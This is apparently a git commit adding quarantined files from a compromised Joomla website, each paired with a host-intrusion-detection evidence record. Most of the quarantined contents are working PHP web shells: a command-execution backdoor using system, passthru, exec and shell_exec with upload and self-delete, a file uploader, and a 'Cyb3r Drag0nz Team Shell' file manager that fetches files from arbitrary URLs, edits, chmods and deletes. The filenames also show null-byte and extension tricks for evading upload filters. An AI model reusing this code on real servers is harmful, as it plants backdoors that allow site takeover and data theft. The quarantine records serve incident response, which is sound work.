.../shaper_helixultimate/50nnp2o4xt.php.json | 6 + .../50nnp2o4xt.php.json.evidence.json | 15 + .../shaper_helixultimate/_h3x_672ba9cf.json | 32 + .../_h3x_672ba9cf.json.evidence.json | 15 + .../_h3x_672ba9cf.phar.json | 32 + .../_h3x_672ba9cf.phar.json.evidence.json | 15 + .../_h3x_672ba9cf.php.json | 32 + .../_h3x_672ba9cf.php.json.evidence.json | 15 + .../_h3x_672ba9cf.php5.json | 32 + .../_h3x_672ba9cf.php5.json.evidence.json | 15 + .../_h3x_672ba9cf.phtml.json | 32 + .../_h3x_672ba9cf.phtml.json.evidence.json | 15 + .../archlinexp.eu/www/tmp/c_03e0fd55.php.json | 10 + .../www/tmp/c_03e0fd55.php.json.evidence.json | 15 + .../archlinexp.eu/www/tmp/c_7f0b46f9.php.json | 10 + .../www/tmp/c_7f0b46f9.php.json.evidence.json | 15 + .../www/tmp/f46vc3nzn1qw.php.json | 320 ++++++++++ .../tmp/f46vc3nzn1qw.php.json.evidence.json | 15 + .../archlinexp.eu/www/tmp/wirrd.php.json | 1 + .../www/tmp/wirrd.php.json.evidence.json | 15 + .../archlinexp.eu/www/tmp/yhajxaav.php.json | 320 ++++++++++ .../www/tmp/yhajxaav.php.json.evidence.json | 15 + .../hosting/archlinexp.eu/www/uploader.json | 1 + .../www/uploader.json.evidence.json | 15 + .../hosting/archlinexp.eu/www/vile.php.json | 40 ++ .../www/vile.php.json.evidence.json | 15 + .../archlinexp.eu/www/wp-blog.php.json | 577 ++++++++++++++++++ .../www/wp-blog.php.json.evidence.json | 15 + .../archlinexp.eu/www/wp-blog.php.json.json | 577 ++++++++++++++++++ .../www/wp-blog.php.json.json.evidence.json | 15 + var/www/hosting/archlinexp.eu/www/yetixx.json | 1 + .../www/yetixx.json.evidence.json | 15 + .../www/yhajxaav.php%00.jpg.json | 320 ++++++++++ .../yhajxaav.php%00.jpg.json.evidence.json | 15 + .../www/yhajxaav.php%00.txt.json | 320 ++++++++++ .../yhajxaav.php%00.txt.json.evidence.json | 15 + .../archlinexp.eu/www/yhajxaav.php.bak.json | 320 ++++++++++ .../www/yhajxaav.php.bak.json.evidence.json | 15 + .../archlinexp.eu/www/yhajxaav.php.jpg.json | 320 ++++++++++ .../www/yhajxaav.php.jpg.json.evidence.json | 15 + .../archlinexp.eu/www/yhajxaav.php.json | 320 ++++++++++ .../www/yhajxaav.php.json.evidence.json | 15 + .../archlinexp.eu/www/yhajxaav.php.txt.json | 320 ++++++++++ .../www/yhajxaav.php.txt.json.evidence.json | 15 + .../archlinexp.eu/www/yhajxaav.php4.json | 320 ++++++++++ .../www/yhajxaav.php4.json.evidence.json | 15 + .../archlinexp.eu/www/yhajxaav.php5.json | 320 ++++++++++ .../www/yhajxaav.php5.json.evidence.json | 15 + .../archlinexp.eu/www/yhajxaav.phtml.json | 320 ++++++++++ .../www/yhajxaav.phtml.json.evidence.json | 15 + 186 files changed, 19999 insertions(+) create mode 100644 var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/components/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/index.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/index.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/ko6h7s5e9kak.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/language/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/templates/hathor/index.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/templates/isis/index.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/administrator/yhajxaav.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/bexkn.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/bexkn.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/c_03e0fd55.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/c_7f0b46f9.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/c_03e0fd55.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/c_7f0b46f9.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/cache/yhajxaav.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/cbdjs.json create mode 100644 var/www/hosting/archlinexp.eu/www/cbdjs.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/components/com_content/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/components/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/cyberdjs.json create mode 100644 var/www/hosting/archlinexp.eu/www/cyberdjs.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json create mode 100644 var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.phtml.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/friska.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/friska.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/50nnp2o4xt.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/6iyo68ipsz.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.phtml.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/temp.f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/images/yhajxaav.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/joth73.json create mode 100644 var/www/hosting/archlinexp.eu/www/joth73.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phar.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php5.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.php7.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json create mode 100644 var/www/hosting/archlinexp.eu/www/ko6h7s5e9kak.phtml.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/language/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/logs/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/logs/yhajxaav.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/50nnp2o4xt.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/c_03e0fd55.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/c_7f0b46f9.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/ko6h7s5e9kak.phtml.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/media/yhajxaav.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/modules/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/modules/mod_custom/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/50nnp2o4xt.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/_h3x_672ba9cf.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/beez3/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/beez3/index.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/protostar/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/protostar/index.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/50nnp2o4xt.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phar.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.php5.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json create mode 100644 var/www/hosting/archlinexp.eu/www/templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/c_03e0fd55.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/c_7f0b46f9.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/f46vc3nzn1qw.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/wirrd.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/tmp/yhajxaav.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/uploader.json create mode 100644 var/www/hosting/archlinexp.eu/www/uploader.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/vile.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/vile.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/wp-blog.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/wp-blog.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json create mode 100644 var/www/hosting/archlinexp.eu/www/wp-blog.php.json.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yetixx.json create mode 100644 var/www/hosting/archlinexp.eu/www/yetixx.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.jpg.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php%00.txt.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.bak.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.jpg.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php.txt.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php4.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.php5.json.evidence.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json create mode 100644 var/www/hosting/archlinexp.eu/www/yhajxaav.phtml.json.evidence.json diff --git a/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json b/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json new file mode 100644 index 0000000..0d0bf2f --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json @@ -0,0 +1,6 @@ +
+
\ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json.evidence.json new file mode 100644 index 0000000..28ff2bf --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "7166", + "log_excerpt": "[quarantine] www.archlinexp.eu:50nnp2o4xt.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/50nnp2o4xt.php.json)", + "original_sha256": "ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1", + "original_stat": { + "gid": 30037, + "mtime": 1784278950, + "size": 298, + "uid": 20043 + }, + "rel_path": "50nnp2o4xt.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json b/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json new file mode 100644 index 0000000..af5ab12 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json @@ -0,0 +1,32 @@ +$target"; + } else { + echo "❈ Upload failed!"; + } + exit; +} +?> + + +Upload + +
+

📤 UPLOAD

+ +

+ +
+ + \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json.evidence.json new file mode 100644 index 0000000..0efbe5c --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4848", + "log_excerpt": "[quarantine] www.archlinexp.eu:_h3x_672ba9cf.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/_h3x_672ba9cf.php.json)", + "original_sha256": "472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a", + "original_stat": { + "gid": 30037, + "mtime": 1783863598, + "size": 1102, + "uid": 20043 + }, + "rel_path": "_h3x_672ba9cf.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json new file mode 100644 index 0000000..711797a --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json.evidence.json new file mode 100644 index 0000000..0f287bf --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5110", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/cache/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/cache/c_03e0fd55.php.json)", + "original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d", + "original_stat": { + "gid": 30037, + "mtime": 1783194685, + "size": 762, + "uid": 20043 + }, + "rel_path": "administrator/cache/c_03e0fd55.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json new file mode 100644 index 0000000..3b8ccaa --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json @@ -0,0 +1,10 @@ +&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}} +if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}} +if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}} +echo'S|'.php_uname(); +?> \ No newline at end of file diff --git a/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json.evidence.json b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json.evidence.json new file mode 100644 index 0000000..9b47ee5 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "5114", + "log_excerpt": "[quarantine] www.archlinexp.eu:administrator/cache/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/administrator/cache/c_7f0b46f9.php.json)", + "original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8", + "original_stat": { + "gid": 30037, + "mtime": 1783201892, + "size": 762, + "uid": 20043 + }, + "rel_path": "administrator/cache/c_7f0b46f9.php.json", + "result": "quarantined", + "timestamp": "20260718T160204Z", + "vhost": "www.archlinexp.eu" +} diff --git a/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json b/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json new file mode 100644 index 0000000..79f80b9 --- /dev/null +++ b/var/www/hosting/archlinexp.eu/www/administrator/cache/f46vc3nzn1qw.php.json @@ -0,0 +1,320 @@ + + + + Cyb3r Drag0nz Team Shell + + + + + +
+ Google +

Cyb3r Drag0nz Team Shell

+
+ +NONE" : "".$disfunc.""; + +function author() { + echo "

Cyb3r Drag0nz Team • Google Edition
"; + exit(); +} + +function cekdir() { + $lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd(); + return is_writable($lokasi) ? "Writeable" : "Not Writeable"; +} + +function cekroot() { + return is_writable($_SERVER['DOCUMENT_ROOT']) ? "Writeable" : "Not Writeable"; +} + +function xrmdir($dir) { + $items = scandir($dir); + foreach ($items as $item) { + if ($item === '.' || $item === '..') continue; + $path = $dir.'/'.$item; + is_dir($path) ? xrmdir($path) : unlink($path); + } + rmdir($dir); +} + +function green($text) { echo "
".$text."
"; } +function red($text) { echo "
".$text."
"; } + +$path = isset($_GET['path']) ? $_GET['path'] : getcwd(); +$path = str_replace('\\','/',$path); +$dirs = explode('/',$path); +?> + +
+ Server :
+ System :
+ User :
+ PHP Version :
+ Disable Functions :
+ Current Directory : $dir) { + if($dir == '' && $i == 0) { echo '/'; continue; } + if($dir == '') continue; + echo ''.$dir.'/'; + } + ?>
+ Directory Status: | Document Root: +
+ + +
+

Upload File

+
+

+

+ + + + + +

+ + + + +
+
+ +" . htmlspecialchars($target) . ""); + } else { + red("Failed to upload file!"); + } + } + elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) { + $target = $lokasi . "/" . $_POST['namalink']; + $data = @file_put_contents($target, @file_get_contents($_POST['darilink'])); + if ($data !== false) { + green("File uploaded from URL → " . htmlspecialchars($target) . ""); + } else { + red("Failed to upload from URL!"); + } + } +} + +// File viewer, delete, chmod, rename, edit actions (kept your original logic) +if (isset($_GET['fileloc'])) { + echo "

Viewing: " . htmlspecialchars($_GET['fileloc']) . "

"; + echo "
" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "
"; + author(); +} + +// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before) + +// Directory & File listing table (same structure as previous version) +echo ' + + + + + +'; + +foreach(scandir($path) as $dir) { + if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue; + echo " + + + + + "; +} + +foreach(scandir($path) as $file) { + if(!is_file($path."/".$file)) continue; + $size = round(filesize($path."/".$file)/1024, 2) . " KB"; + echo " + + + + + "; +} + +echo '
NameSizePermissionsOptions
📁 ".$dir."--".statusnya($path."/".$dir)." +
+ + + + +
+
📄 ".$file."".$size."".statusnya($path."/".$file)." +
+ + + + +
+

